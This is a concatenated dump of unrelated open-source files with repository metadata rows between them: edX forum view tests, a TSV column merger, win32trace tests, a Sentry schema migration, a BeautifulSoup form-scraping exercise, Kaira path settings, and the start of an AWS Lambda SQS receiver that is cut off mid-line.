"user_id": str(self.student.id),
"closed": False,
})
request = RequestFactory().post("dummy_url", {"body": text})
request.user = self.student
request.view_name = "update_comment"
response = views.update_comment(request, course_id=self.course.id.to_deprecated_string(), comment_id="dummy_comment_id")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class CreateSubCommentUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request):
self._set_mock_request_data(mock_request, {
"closed": False,
"depth": 1,
})
request = RequestFactory().post("dummy_url", {"body": text})
request.user = self.student
request.view_name = "create_sub_comment"
response = views.create_sub_comment(request, course_id=self.course.id.to_deprecated_string(), comment_id="dummy_comment_id")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class UsersEndpointTestCase(ModuleStoreTestCase, MockRequestSetupMixin):
def set_post_counts(self, mock_request, threads_count=1, comments_count=1):
"""
sets up a mock response from the comments service for getting post counts for our other_user
"""
self._set_mock_request_data(mock_request, {
"threads_count": threads_count,
"comments_count": comments_count,
})
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
self.enrollment = CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
self.other_user = UserFactory.create(username="other")
CourseEnrollmentFactory(user=self.other_user, course_id=self.course.id)
def make_request(self, method='get', course_id=None, **kwargs):
course_id = course_id or self.course.id
request = getattr(RequestFactory(), method)("dummy_url", kwargs)
request.user = self.student
request.view_name = "users"
return views.users(request, course_id=course_id.to_deprecated_string())
@patch('lms.lib.comment_client.utils.requests.request')
def test_finds_exact_match(self, mock_request):
self.set_post_counts(mock_request)
response = self.make_request(username="other")
self.assertEqual(response.status_code, 200)
self.assertEqual(
json.loads(response.content)["users"],
[{"id": self.other_user.id, "username": self.other_user.username}]
)
@patch('lms.lib.comment_client.utils.requests.request')
def test_finds_no_match(self, mock_request):
self.set_post_counts(mock_request)
response = self.make_request(username="othor")
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content)["users"], [])
def test_requires_GET(self):
response = self.make_request(method='post', username="other")
self.assertEqual(response.status_code, 405)
def test_requires_username_param(self):
response = self.make_request()
self.assertEqual(response.status_code, 400)
content = json.loads(response.content)
self.assertIn("errors", content)
self.assertNotIn("users", content)
def test_course_does_not_exist(self):
course_id = SlashSeparatedCourseKey.from_deprecated_string("does/not/exist")
response = self.make_request(course_id=course_id, username="other")
self.assertEqual(response.status_code, 404)
content = json.loads(response.content)
self.assertIn("errors", content)
self.assertNotIn("users", content)
def test_requires_requestor_enrolled_in_course(self):
# unenroll self.student from the course.
self.enrollment.delete()
response = self.make_request(username="other")
self.assertEqual(response.status_code, 404)
content = json.loads(response.content)
self.assertTrue(content.has_key("errors"))
self.assertFalse(content.has_key("users"))
@patch('lms.lib.comment_client.utils.requests.request')
def test_requires_matched_user_has_forum_content(self, mock_request):
self.set_post_counts(mock_request, 0, 0)
response = self.make_request(username="other")
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content)["users"], [])
| agpl-3.0 | 164,405,407,159,866,430 | 39.188517 | 153 | 0.579589 | false |
TiedNets/TiedNets | tsv_col_adder.py | 1 | 1976 | import csv
from itertools import izip
# works for tsv files, make sure the two input files have the same number of lines
def add_cols_from_file(main_fpath, add_fpath, output_fpath):
with open(main_fpath, 'r') as main_file, open(add_fpath, 'r') as add_file, open(output_fpath, 'w') as out_file:
main_reader = csv.reader(main_file, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
add_reader = csv.reader(add_file, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
out_writer = csv.writer(out_file, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
main_header = main_reader.next()
add_header = add_reader.next()
out_header = main_header + add_header
out_writer.writerow(out_header)
for main_row, add_row in izip(main_reader, add_reader):
out_row = main_row + add_row
out_writer.writerow(out_row)
# this function was only used once, as an alternative to the other one
def add_cols_to_file():
indep_var_vals = range(0, 61, 10)
first_instance = 0
last_instance = 60
seeds = range(0, 40)
for i in range(0, 6):
output_fpath = '/home/agostino/Documents/Simulations/test_mp/safe_cnt_col_{}.tsv'.format(i)
with open(output_fpath, 'w') as out_file:
out_writer = csv.writer(out_file, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
out_writer.writerow(['safe_nodes_count'])
for var_value in indep_var_vals:
for instance_num in range(first_instance, last_instance, 1):
for seed in seeds:
out_writer.writerow([var_value])
for i in range(0, 3):
main_fpath = '/home/agostino/Documents/Simulations/test_mp/ml_stats_{}.tsv'.format(i)
add_fpath = '/home/agostino/Documents/Simulations/test_mp/safe_cnt_col_{}.tsv'.format(i)
output_fpath = '/home/agostino/Documents/Simulations/test_mp/ml_stats_fix_{}.tsv'.format(i)
add_cols_from_file(main_fpath, add_fpath, output_fpath)
| gpl-3.0 | -3,607,733,378,828,287,500 | 46.047619 | 115 | 0.643725 | false |
JulienMcJay/eclock | windows/Python27/Lib/site-packages/pywin32-218-py2.7-win32.egg/test/test_win32trace.py | 17 | 11259 | import unittest
import win32trace
import threading
import time
import os
import sys
if __name__=='__main__':
this_file = sys.argv[0]
else:
this_file = __file__
def CheckNoOtherReaders():
win32trace.write("Hi")
time.sleep(0.05)
if win32trace.read() != "Hi":
# Reset everything so following tests still fail with this error!
win32trace.TermRead()
win32trace.TermWrite()
raise RuntimeError("An existing win32trace reader appears to be " \
"running - please stop this process and try again")
class TestInitOps(unittest.TestCase):
def setUp(self):
# clear old data
win32trace.InitRead()
win32trace.read()
win32trace.TermRead()
def tearDown(self):
try:
win32trace.TermRead()
except win32trace.error:
pass
try:
win32trace.TermWrite()
except win32trace.error:
pass
def testInitTermRead(self):
self.assertRaises(win32trace.error, win32trace.read)
win32trace.InitRead()
result = win32trace.read()
self.assertEquals(result, '')
win32trace.TermRead()
self.assertRaises(win32trace.error, win32trace.read)
win32trace.InitRead()
self.assertRaises(win32trace.error, win32trace.InitRead)
win32trace.InitWrite()
self.assertRaises(win32trace.error, win32trace.InitWrite)
win32trace.TermWrite()
win32trace.TermRead()
def testInitTermWrite(self):
self.assertRaises(win32trace.error, win32trace.write, 'Hei')
win32trace.InitWrite()
win32trace.write('Johan Galtung')
win32trace.TermWrite()
self.assertRaises(win32trace.error, win32trace.write, 'Hei')
def testTermSematics(self):
win32trace.InitWrite()
win32trace.write('Ta da')
# if we both Write and Read are terminated at the same time,
# we lose the data as the win32 object is closed. Note that
# if another writer is running, we do *not* lose the data - so
# test for either the correct data or an empty string
win32trace.TermWrite()
win32trace.InitRead()
self.failUnless(win32trace.read() in ['Ta da', ''])
win32trace.TermRead()
# we keep the data because we init read before terminating write
win32trace.InitWrite()
win32trace.write('Ta da')
win32trace.InitRead()
win32trace.TermWrite()
self.assertEquals('Ta da', win32trace.read())
win32trace.TermRead()
class BasicSetupTearDown(unittest.TestCase):
def setUp(self):
win32trace.InitRead()
# If any other writers are running (even if not actively writing),
# terminating the module will *not* close the handle, meaning old data
# will remain. This can cause other tests to fail.
win32trace.read()
win32trace.InitWrite()
def tearDown(self):
win32trace.TermWrite()
win32trace.TermRead()
class TestModuleOps(BasicSetupTearDown):
def testRoundTrip(self):
win32trace.write('Syver Enstad')
syverEnstad = win32trace.read()
self.assertEquals('Syver Enstad', syverEnstad)
def testRoundTripUnicode(self):
win32trace.write(u'\xa9opyright Syver Enstad')
syverEnstad = win32trace.read()
# str objects are always returned in py2k (latin-1 encoding was used
# on unicode objects)
self.assertEquals('\xa9opyright Syver Enstad', syverEnstad)
def testBlockingRead(self):
win32trace.write('Syver Enstad')
self.assertEquals('Syver Enstad', win32trace.blockingread())
def testBlockingReadUnicode(self):
win32trace.write(u'\xa9opyright Syver Enstad')
# str objects are always returned in py2k (latin-1 encoding was used
# on unicode objects)
self.assertEquals('\xa9opyright Syver Enstad', win32trace.blockingread())
def testFlush(self):
win32trace.flush()
class TestTraceObjectOps(BasicSetupTearDown):
def testInit(self):
win32trace.TermRead()
win32trace.TermWrite()
traceObject = win32trace.GetTracer()
self.assertRaises(win32trace.error, traceObject.read)
self.assertRaises(win32trace.error, traceObject.write, '')
win32trace.InitRead()
win32trace.InitWrite()
self.assertEquals('', traceObject.read())
traceObject.write('Syver')
def testFlush(self):
traceObject = win32trace.GetTracer()
traceObject.flush()
def testIsatty(self):
tracer = win32trace.GetTracer()
assert tracer.isatty() == False
def testRoundTrip(self):
traceObject = win32trace.GetTracer()
traceObject.write('Syver Enstad')
self.assertEquals('Syver Enstad', traceObject.read())
class WriterThread(threading.Thread):
def run(self):
self.writeCount = 0
for each in range(self.BucketCount):
win32trace.write(str(each))
self.writeCount = self.BucketCount
def verifyWritten(self):
return self.writeCount == self.BucketCount
class TestMultipleThreadsWriting(unittest.TestCase):
# FullBucket is the thread count
FullBucket = 50
BucketCount = 9 # buckets must be a single digit number (ie. less than 10)
def setUp(self):
WriterThread.BucketCount = self.BucketCount
win32trace.InitRead()
win32trace.read() # clear any old data.
win32trace.InitWrite()
CheckNoOtherReaders()
self.threads = [WriterThread() for each in range(self.FullBucket)]
self.buckets = range(self.BucketCount)
for each in self.buckets:
self.buckets[each] = 0
def tearDown(self):
win32trace.TermRead()
win32trace.TermWrite()
def areBucketsFull(self):
bucketsAreFull = True
for each in self.buckets:
assert each <= self.FullBucket, each
if each != self.FullBucket:
bucketsAreFull = False
break
return bucketsAreFull
def read(self):
while 1:
readString = win32trace.blockingread()
for ch in readString:
integer = int(ch)
count = self.buckets[integer]
assert count != -1
self.buckets[integer] = count + 1
if self.buckets[integer] == self.FullBucket:
if self.areBucketsFull():
return
def testThreads(self):
for each in self.threads:
each.start()
self.read()
for each in self.threads:
each.join()
for each in self.threads:
assert each.verifyWritten()
assert self.areBucketsFull()
class TestHugeChunks(unittest.TestCase):
# BiggestChunk is the size where we stop stressing the writer
BiggestChunk = 2**16 # 256k should do it.
def setUp(self):
win32trace.InitRead()
win32trace.read() # clear any old data
win32trace.InitWrite()
def testHugeChunks(self):
data = "*" * 1023 + "\n"
while len(data) <= self.BiggestChunk:
win32trace.write(data)
data = data + data
# If we made it here, we passed.
def tearDown(self):
win32trace.TermRead()
win32trace.TermWrite()
import win32event
import win32process
class TraceWriteProcess:
def __init__(self, threadCount):
self.exitCode = -1
self.threadCount = threadCount
def start(self):
procHandle, threadHandle, procId, threadId = win32process.CreateProcess(
None, # appName
'python.exe "%s" /run_test_process %s %s' % (this_file,
self.BucketCount,
self.threadCount),
None, # process security
None, # thread security
0, # inherit handles
win32process.NORMAL_PRIORITY_CLASS,
None, # new environment
None, # Current directory
win32process.STARTUPINFO(), # startup info
)
self.processHandle = procHandle
def join(self):
win32event.WaitForSingleObject(self.processHandle,
win32event.INFINITE)
self.exitCode = win32process.GetExitCodeProcess(self.processHandle)
def verifyWritten(self):
return self.exitCode == 0
class TestOutofProcess(unittest.TestCase):
BucketCount = 9
FullBucket = 50
def setUp(self):
win32trace.InitRead()
TraceWriteProcess.BucketCount = self.BucketCount
self.setUpWriters()
self.buckets = range(self.BucketCount)
for each in self.buckets:
self.buckets[each] = 0
def tearDown(self):
win32trace.TermRead()
def setUpWriters(self):
self.processes = []
# 5 processes, quot threads in each process
quot, remainder = divmod(self.FullBucket, 5)
for each in range(5):
self.processes.append(TraceWriteProcess(quot))
if remainder:
self.processes.append(TraceWriteProcess(remainder))
def areBucketsFull(self):
bucketsAreFull = True
for each in self.buckets:
assert each <= self.FullBucket, each
if each != self.FullBucket:
bucketsAreFull = False
break
return bucketsAreFull
def read(self):
while 1:
readString = win32trace.blockingread()
for ch in readString:
integer = int(ch)
count = self.buckets[integer]
assert count != -1
self.buckets[integer] = count + 1
if self.buckets[integer] == self.FullBucket:
if self.areBucketsFull():
return
def testProcesses(self):
for each in self.processes:
each.start()
self.read()
for each in self.processes:
each.join()
for each in self.processes:
assert each.verifyWritten()
assert self.areBucketsFull()
def _RunAsTestProcess():
# Run as an external process by the main tests.
WriterThread.BucketCount = int(sys.argv[2])
threadCount = int(sys.argv[3])
threads = [WriterThread() for each in range(threadCount)]
win32trace.InitWrite()
for t in threads:
t.start()
for t in threads:
t.join()
for t in threads:
if not t.verifyWritten():
sys.exit(-1)
if __name__ == '__main__':
if sys.argv[1:2]==["/run_test_process"]:
_RunAsTestProcess()
sys.exit(0)
# If some other win32traceutil reader is running, these tests fail
# badly (as the other reader sometimes sees the output!)
win32trace.InitRead()
win32trace.InitWrite()
CheckNoOtherReaders()
# reset state so test env is back to normal
win32trace.TermRead()
win32trace.TermWrite()
unittest.main()
| gpl-2.0 | 3,742,841,848,567,057,400 | 31.729651 | 81 | 0.602984 | false |
alex/sentry | sentry/migrations/0036_auto__chg_field_option_value__chg_field_projectoption_value.py | 7 | 15105 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Option.value'
db.alter_column('sentry_option', 'value', self.gf('django.db.models.fields.TextField')())
# Changing field 'ProjectOption.value'
db.alter_column('sentry_projectoptions', 'value', self.gf('django.db.models.fields.TextField')())
def backwards(self, orm):
# Changing field 'Option.value'
db.alter_column('sentry_option', 'value', self.gf('django.db.models.fields.CharField')(max_length=200))
# Changing field 'ProjectOption.value'
db.alter_column('sentry_projectoptions', 'value', self.gf('django.db.models.fields.CharField')(max_length=200))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['auth.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key', 'value'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'unique_together': "(('key', 'value'),)", 'object_name': 'Option'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project_set'", 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
| bsd-3-clause | 8,498,152,610,313,789,000 | 76.860825 | 182 | 0.547368 | false |
krzyste/ud032 | Lesson_2_Data_in_More_Complex_Formats/18-Using_Beautiful_Soup/html_soup.py | 1 | 1546 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Please note that the function 'make_request' is provided for your reference only.
# You will not be able to to actually use it from within the Udacity web UI
# All your changes should be in the 'extract_data' function
from bs4 import BeautifulSoup
import requests
import json
html_page = "page_source.html"
def extract_data(page):
data = {"eventvalidation": "",
"viewstate": ""}
with open(page, "r") as html:
soup = BeautifulSoup(html)
_eventValid = soup.find(id="__EVENTVALIDATION")
data["eventvalidation"]=_eventValid["value"]
_viewState = soup.find(id="__VIEWSTATE")
data["viewstate"]=_viewState["value"]
return data
def make_request(data):
eventvalidation = data["eventvalidation"]
viewstate = data["viewstate"]
r = requests.post("http://www.transtats.bts.gov/Data_Elements.aspx?Data=2",
data={'AirportList': "BOS",
'CarrierList': "VX",
'Submit': 'Submit',
"__EVENTTARGET": "",
"__EVENTARGUMENT": "",
"__EVENTVALIDATION": eventvalidation,
"__VIEWSTATE": viewstate
})
return r.text
def test():
data = extract_data(html_page)
assert data["eventvalidation"] != ""
assert data["eventvalidation"].startswith("/wEWjAkCoIj1ng0")
assert data["viewstate"].startswith("/wEPDwUKLTI")
test() | agpl-3.0 | -8,655,408,168,734,604,000 | 29.333333 | 83 | 0.575679 | false |
MrPablozOne/Bakalarka_Kaira | gui/paths.py | 6 | 1111 | #
# Copyright (C) 2010 Stanislav Bohm
#
# This file is part of Kaira.
#
# Kaira is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License, or
# (at your option) any later version.
#
# Kaira is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Kaira. If not, see <http://www.gnu.org/licenses/>.
#
import os
KAIRA_GUI = os.path.dirname(os.path.abspath(__file__))
KAIRA_ROOT = os.path.dirname(KAIRA_GUI)
ICONS_DIR = os.path.join(KAIRA_GUI, "icons")
UI_DIR = os.path.join(KAIRA_GUI, "ui")
PTP_DIR = os.path.join(KAIRA_ROOT, "ptp")
PTP_BIN = os.path.join(KAIRA_ROOT, "ptp", "ptp.py")
PACKAGES_DIR = os.path.join(KAIRA_ROOT, "packages")
EXTENSIONS_DIR = os.path.join(KAIRA_GUI, "extensions")
| gpl-3.0 | 7,730,314,161,531,714,000 | 33.71875 | 73 | 0.70387 | false |
lucioveloso/lambda-toolkit | lambda_toolkit/modules/receiver.py | 1 | 2977 | #!/usr/bin/env python
import json
import os
import sys
import signal
from lambda_toolkit.modules.utils import Utils
from lambda_toolkit.modules.lambdacontext import LambdaContext
def signal_handler(signal, frame):
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
class Receiver:
def __init__(self, conf, kwargs):
self.log = conf.log
self.conf = conf
self.sqsname = kwargs['sqsname']
self.projectname = kwargs['projectname']
self.sqs = conf.get_boto3("sqs", "resource")
def collect_receiver(self):
queue = self.sqs.get_queue_by_name(QueueName=self.sqsname)
self.log.info("Importing project " + self.projectname)
pp = os.path.join(Utils.fixpath(self.conf.sett['C_BASE_DIR']),
Utils.fixpath(self.conf.sett['C_LAMBDAS_DIR']),
self.conf.region, self.projectname)
self.log.debug("Using project dir: " + pp)
sys.path.append(pp)
a = __import__("index")
func = getattr(a, "lambda_handler")
self.log.info("Starting the receiver using the queue " + self.sqsname)
if 'variables' in self.conf.projects[self.projectname]:
vars = self.conf.projects[self.projectname]['variables']
for v in vars:
self.log.info("Injecting lambda variable '" + v + "' with value '" + vars[v] + "'.")
os.environ[v] = vars[v]
while True:
try:
sys.stdout.write(".")
sys.stdout.flush()
msg_list = queue.receive_messages(
VisibilityTimeout=int(self.conf.sett['QUEUE_GETMESSAGE_VISIBILITY_TIMEOUT']),
MaxNumberOfMessages=int(self.conf.sett['QUEUE_GETMESSAGE_MAXNUMBEROFMESSAGES']),
WaitTimeSeconds=int(self.conf.sett['QUEUE_GETMESSAGE_WAITTIMESECONDS']))
for msg in msg_list:
jsonmsg = json.loads(msg.body)
self.log.info("=======================================")
self.log.info("* New message. Sending to " + self.projectname)
if func(jsonmsg["event"], LambdaContext(jsonmsg["context"])):
try:
msg.delete()
self.log.info("* Message deleted.")
except Exception as e:
self.log.warn("* Failed to delete the message. Expired.")
self.log.warn("Configured timeout [QUEUE_GETMESSAGE_VISIBILITY_TIMEOUT]: " + str(self.conf.sett[
